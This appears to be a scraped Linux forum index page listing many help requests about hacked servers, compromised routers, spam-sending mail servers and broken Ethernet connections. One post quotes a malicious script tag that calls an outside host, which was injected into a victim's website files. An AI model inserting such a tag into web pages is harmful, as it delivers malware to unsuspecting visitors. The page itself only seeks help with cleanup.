Ubuntu Security :: Server Hacked - Ethernet No Longer Working
Jun 19, 2010
My server (Ubuntu 10.04 desktop) was hacked. I had my ethernet plugged in to an Intel 82557 Ethernet Pro card (Pulse) when my server was first attacked. After it was attacked I reinstalled the system but my ethernet card still would not work. Ubuntu recognized it, but it is continually disconnected and the little status lights on the card do not light up anymore.
So then I plugged the ethernet to the mother board itself. Well, my server was hacked again and now the ethernet on the motherboard does not work. Again, Ubuntu (after a reinstall) recognizes the hardware but nothing happens when I plug the etherent in. The motherboard is a BioStar P4M900 VIA chipset. I have a few of the system logs here [URL] which I saved right after the first attack.
View 9 Replies
ADVERTISEMENT
Apr 11, 2011
Awoke to millions of failed SSH attempts into my public server. Behind a firewall which forwards only SSH and HTTP. Local iptables deny everything except SSH and HTTP. Exact same symptoms and results as Chris over at his site: here.I just want to know how they managed to execute a script, or make changes etc? Here's some info:According to cat /var/log/secure | grep "Accepted" no one besides myself gained entry via SSH.The FTP account (500:48 (Purposely in apache group)) is chrooted to a 775 directory and vsftpd does not accept anonymous entry. vsftpd and xferlog's are empty?
Code:
You have new mail in /var/spool/mail/root
[root@dev etc]# tail /var/spool/mail/root
[code]....
View 11 Replies
View Related
Nov 14, 2010
I always use professional services to secure my servers. Everything was fine for years but a week ago my server got hacked.I don't know how the hacker got my username/password - it was not something like admin, password.9 months ago my PC was infected with some virus which connected to the FTP server by using password which was saved in CuteFTP and infected all index files with some javascript. Then I changed the user/FTP password and didn't save it anymore in Cute FTP. Of course, I checked all the folders and re-uploaded all infected files. Is it possible that this virus uploaded some hidden file which was able to get the new password for this account?
The server was hacked from so called Tor IP address. I am tiref of worrying about server security and now have an idea to get a static IP address from my ISP and to allow logins only from this IP address. What do you think about it? This idea looks good for me but are there any risks to lose access to the server. Can ISP provider change the static IP address for some reason?
View 9 Replies
View Related
Jun 13, 2011
I just got control over a server that was hacked several months back. The other day we started receiving rejected emails sent from my server to a yahoo email address that is no longer active that contained users login information. I am trying to find the process that is sending these emails. So far its been like finding a needle in a haystack. The email that is being sent is appending the login information each time it is sent so there must be a local file that contains this information. I have tried using grep and find without any luck.
View 2 Replies
View Related
Oct 8, 2010
How to secure a Terminal Server. so that it can't be hacked by bruteforce/divtionary tools ?
View 7 Replies
View Related
Jan 3, 2011
My server is probaly hacked and sending spam emails. I see them randomly in maillog (/usr/local/psa/var/log/maillog, server has a plesk panel), sometimes a few in a long time, sometimes a lot of them.Here is a sample of it:
Jan 4 00:47:08 acv360 qmail-remote-handlers[17662]: Handlers Filter before-remote for qmail started ...
Jan 4 00:47:08 acv360 qmail-remote-handlers[17662]: from=root@acv360.com
[code].....
View 7 Replies
View Related
Jun 22, 2010
I have a server hacked when i try to log in i type root but won't let me type a passwdthere are no services up, can't see page mail nothing
View 11 Replies
View Related
Mar 8, 2010
I want to know if any one hacked or getting into my computer. I am using lucidlynx right now, My computer directly connected to modem, not using any wireless router. How can i check if some one hacked? How to prevent it?
View 6 Replies
View Related
Jan 3, 2011
I have a 6yo laptop...z60m. Solid little thing that I knocked around so much the hinge broke. My dad jerryrigged it so it can stay open.
So now I use it as a glorified DVD player. Then, around February the hard drive died. I put it in fresh, loaded a couple of regular games and the DVD modifications to play DVD's. So, besides the basic upgrade to 9.1 not much as been done.
Well, last week my panel disappeared. I procrastinated and last night I got on the computer. I did F2 and "xfce-panel" and my panel reappeared exactly how I'd last tweaked it.
With on exception. This blue globe, "Akonadi" had mysteriously appeared.
Thing is that I haven't installed or updated anything for 8 months...why? becuase I haven't had this thing connected to the Internet. The wireless tower has been on. (my bad) but all of the signigals in my neck of the wood are encripted so I just let it be.
I don't know where this program came from. Is it loaded in xubuntu? Why would it show up? And furthermore if there was someone with malicious intent (unfortunatly I do have to take that into consideration) have put this on for data collection?
View 8 Replies
View Related
Feb 27, 2011
I have windows computer and it is being hacked.About month ago or more some one hacked my router and install new firmware from Firmware Version: Talisman/Basic V1.2.9a
My router is linksys and SSID got changed to sveasoft.I had WPA set up and MAC filtering .
Some one hacked my router and change Firmware Version.And user name and password also got change to just admin.
Well now I got a pop up from my Kaspersky saying network attack scan.generic.TCP 74.63.245.168
only thing I can find on it http://whatismyipaddress.com/ip/74.63.245.168
It is Limestone Networks in Dallas.
Some strang things have been happing to my computer in past 4 months and is getting worse.
I have no firewall or router now.And have not gone to the store and get new router yet and I'm thinking of formatting my computer and putting linux and get good firewall like zone-alarm.
View 9 Replies
View Related
Feb 19, 2011
I had a serious breach of the cellular segment of my communications network this week. All I can say is nobody got hurt. The attackers also knew where to find me via email. I'm concerned that perhaps they've penetrated this aspect of my system as well, although they seemed pretty specifically focused on the phone. There have been no changes on anything on my computer, and of course, I went ahead and changed all the passwords. How can I verify or at least look into the possibility of having been hacked as well.
View 8 Replies
View Related
Mar 22, 2011
my computer has been surely hacked for at least more than two months; my private information are being hacked and spread around! I initally used Windows Vista and I had the firewall off and no antivirus software. When I realized that my OS had been hacked, I began turning my firewall on and installing security softwares, but nothing stopped the hack.
Yesterday, I erased all my partitions and installed Ubuntu 10.10. I installed rkhunter and a firewall. I changed my static IP adress, at least for the sake of knowledge, to another one, then I got disconnected since my router only allows my old IP.
When I'm about to write my admin password, I disconnect from the network. I've scanned my system using rkhunter, and the result is a list of 30 suspicious files!
Can I adjust my router in a way that it can allow any IP adress? If yes, can I have a non-static IP adress? How to prevent the hacking in the first place? However, I believe, I don't know yet, that my Ubuntu has also been hacked...
If I can't get rid of the hacker(s), then I should permanently disconnect from internet and find another way to receive information anonymously through the internet.
View 9 Replies
View Related
Jul 3, 2009
I have LAN with 20 machines. I see that one of them is infected. Its sending a lot of packets to the internet. My internet connection at this momment is realy slow. What should I do? How to detect which machine is infected? I'm using hardware firewall. Fortigate... Its hard to configure there nice logs. Any good software. I don't want to switch off network cable from each machine and check.
View 10 Replies
View Related
Apr 13, 2010
I need to know whether Ubuntu can be hacked when it is installed as a dual boot with W7 by hacking windows and getting access to the Ubuntu partition?
What I would also like to know if this way can be used to put a key logger or screen capture in Ubuntu which installs next time Ubuntu is started?
View 9 Replies
View Related
Apr 28, 2010
I believe it is a keylogger because my Facebook account has been hacked, I believe my email has as well. I heard that even if you reformat a harddrive, the virus could still sit there and apparently that is what happened to me. how to be rid of it and keep my security. I installed RKhunter and Chkrootkit. Rkhunter reports warning files while checking my filesystem. I can post a log if need be.
View 9 Replies
View Related
Nov 18, 2010
A scan on my computer reported as up many local ips which simply does not exist in my network. This host is supposed to have ip 192.168.0.4, but all other ip should not be there. I have a USB modem connected to a Linux box, connected itselfs to a wifi linksys router and thats it.
# nmap -sP '192.168.*.*' | grep -v down
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2010-11-18 21:46 CET
Host 192.168.0.4 appears to be up.
Host 192.168.7.27 appears to be up.
Host 192.168.10.0 appears to be up.
[Code]...
View 3 Replies
View Related
Apr 9, 2010
I've discovered that after restoring my site's backup this has happened to me again. How to delete the hacked /home/crocbits directory so that I can restore the backup under the same username. When I try to delete /home/crocbits I get this message when logged in as root:
[Code]...
View 9 Replies
View Related
Apr 26, 2011
I just got an email from google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed its recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and txt files recursively and delete that line from them? I don't know how it got in all of them.
View 6 Replies
View Related
Jul 18, 2010
I've set up 10.04 Server so that I could install directly to a command line, due to the fact that Desktop was crashing during the install every time. The installation goes fine, except for the networking portion. DHCP fails every time I try it. So I set up a static IP as an alternative. Once installation completes, none of the network-oriented tools (ping, telnet) work. I've tried pinging my router and I get 'Destination Host Unknown'. This is true if I change to a DHCP oriented setup as well.
The router sees that the machine is there, as indicated by the slowly blinking connection light meaning that it's hooked up to *something* but there's no activity. Also, networking did work within Windows before I nuked it, so I know it has the ability to operate correctly. I'm at a loss, mostly due to my own newness and ignorance of how to start tackling this within this environment.
View 9 Replies
View Related
Jun 8, 2011
I am still quite new to all this but I guess we were all beginners once, this forum seems very helpful.Here is my situation, I will give as much detail as I can.I have a dedicated server which is running CentOS release 5.5.Initially I had Plesk installed, but when I upgraded PHP I damaged the Plesk configuration, and so I installed Webmin instead.
All seems to be fine with this, apart from the DNS configuration / BIND server.I know this because I have one site which uses an external DNS server and this works fine (i.e I can access it from a browser). All the others don't resolve - i.e the ones I set up in Plesk.I've done a bit of investigating to see what is going on, but I'm stabbing in the dark a little.
View 12 Replies
View Related
Apr 7, 2011
my server is web server with centos 5 & parallel 9, don't why all web sites in this server have been added a home pages which is not mind. even the mysql admin also redirected to other site, what i can do!
View 6 Replies
View Related
May 25, 2011
Let me start by saying its a school assignment, and therefore not a real world situation. Nevertheless, I would appreciate any help I can get.The company ProvidIT has contacted us, their website has been hacked. Instead of their normal website, it shows Buy creditcard details online, click here (cc4u.jpg). A classical defacement.The following offenses also might have been committed. So its our job to find evidence for those offences.(I had to translate the Dutch law articles, so they might not be 100% acurate legally speaking, but you get the idea)
- Unlawfully accessing automated systems
- Copy or tap (eavesdrop) data after hacking
- Unlawfully access or use system resources of a 3rd party computer
[code]....
View 3 Replies
View Related
Jul 23, 2009
After using fedora 11 for a month or two now the ethernet gave out on me tonight. However if I switch to my ubuntu or windows XP install it runs fine. I made no recent changes to network connections, and no installed programs that should effect it.
kernel version: 2.6.29.6-213.fc11
default connection: eth0(and only connection)
ifcfg-eth0:
# Networking Interface
DEVICE=eth0
BOOTPROTO=dhcp
HWADDR=00:1F:C6:DB:05:0C
ONBOOT=yes
TYPE=Ethernet
IPV6INIT=no
USERCTL=no
NM_CONTROLLED=yes
NAME=eth0
UUID=5fb06bd0-0bb0-7ffb-45f1-d6edd65f3e03
DNS1=192.168.1.254
PEERDNS=yes
PEERROUTES=yes
I have tried, restarting, older kernel, restarting services, and clearing the DNS Cache. The specific error I get is that "Firefox can't find the server", and most other applications return similar. I can however ping websites still. All other computers on the network are running fine, and booting into another system the internet will work. Just not for fedora.
View 14 Replies
View Related
Apr 2, 2010
I have been using my laptop as a development machine for a few months now, developing php/mysql applications, and testing them offline via the same laptop by pointing the browser to url.
But a few days ago, my url stopped working and I discovered that it will now only work if I have an active internet connection plugged in. Why has this happened and how to I fix my test server so localhost works with or without an internet connection via an ethernet cable.
View 2 Replies
View Related
Mar 1, 2010
I have an absolutely bizarre hardware issue (concerning the Atheros AR8132 PCI-E Fast Ethernet Controller) that has been giving me quite a bit of grief for a while, and having completely hit a wall on this one, I'm a reasonably-experienced Linux user of several years, and have been running Ubuntu 9.10 on an Acer AOD250 netbook for several months out. I know that this model has wireless issues out-of-the-box (easily fixed), but it did not have any noticeable ethernet issues. That is, until I attempted an installation of Arch Linux.
During the Arch Linux installation, the ethernet card was initially detected, but unable to be used (because of a bad module in the kernel released with the installer). As I didn't know the fix for this at the time, I decided to reinstall Ubuntu 9.10. This time, however, the system failed to recognize the wired ethernet whatsoever. Instead, the external activity lights for the port (green and orange) are ALWAYS on, yet the device doesn't function.
I have done a successful install of the latest drivers directly from Atheros for the device and have them automatically loading with the kernel during boot, but as the device isn't recognized, the drivers aren't doing any good. Relevant information:
Code:
root@niobium:~# lspci
00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03)
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03)
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03)
[Code]...
View 3 Replies
View Related
Jul 16, 2010
I installed TrueCrypt in Microsoft Windows XP SP3 (no Linux installations present) and I stopped the TrueCrypt service in the Windows enviroment, and then, I restarted, and all the sudden it seemed the PC can not see the Hard Disk at all at startup, nada... I believe I dismounted it by stopping the TrueCrypt service... So the PC no longer understands there is a TrueCrypt volume in place, and I inserted the TrueCrypt recovery disk, and it can not do any thing, I restored the bootloaders, the true crypt loader, and once I finished this, I press ESC, and it says there are no bootable devices, so nothing. I even decrypted the disk, and it seemed that nothing happened with the restore disk...
Is there any way I can make this partition bootable again? because I have every thing in that partition, every single bit of life... I have used TestDisk under Linux right now, but I am unsure of this, and I also further complicated the boot proccess, and now the PC states at startup about missing partition tables. When I start truecrypt from this Kubuntu live CD, I am unable to see the encrypted hard disk even with root, there is no way to see this hard disk, only can be seen in the TestDisk app. I really I am desperate, at least, if I can not make Windows Boot again, maybe just suck all the files out of the hard disk and put them some where for now, I really need to get back to work, and I cant seem to find a solution...
I know here at Ubuntu forums, some one may have the solution. And I do know for sure all the files on this volume are there because of the TestDisk app, so they are there, they are just not reachable.... (I have posted this problem on a Linux forums instead of a Windows forum because the only way to try to recover the volume is with Linux Kubuntu Live CD
View 2 Replies
View Related
Nov 22, 2010
is there any solution for authentication of ethernet users.something similar to daloradius for wifi.I dont want to use pppoe. is there any way to connect daloradius with dhcp server, so when certain mac address asks for IP first daloradius will look if it is allowed.
View 11 Replies
View Related
May 28, 2010
I'm having some trouble using sudo - it did work fine, but now when I try to use it, I have the following error:
I understand that I have to modify /etc/sudoers but need to have root access to do this. I am using a bootable USB (lucid) with persistent changes and am unable to login as root, because I don't know the default root password, and am unable to use sudo to change it.
The problem occurred after I had some corruption to the casper file system, so I booted into Windows, moved the casper-rw file to another location on my flashdrive, and used a 1GB backup filesystem to repair the corrupt one using fsck.
After booting up from the restored filesystem, sudo would no longer work.
View 9 Replies
View Related
Jan 18, 2010
I noticed that tv_grab is not working any longer. It seems that they do not updated the pages. It is since long time the problem.
View 7 Replies
View Related
Mar 18, 2010
I have been using some of the compiz effects now for just over a week with no problems. but yesterday they stopped working for what seems to be no reason. I have the recommended nVidia driver installed, here is my graphics card from lspci:
Code:
01:00.0 VGA compatible controller: nVidia Corporation G72 [GeForce 7300 LE] (rev a1)
I right clicked on my desktop, and went to 'Change Destop background', then visual effects. This has been set to None. I cannot change this to Normal or extra, as I get an error saying
Code:
Desktop effects could not be enabled
I have followed another thread which explained how to unistall and reinstall compiz, but it did nothing.
View 5 Replies
View Related
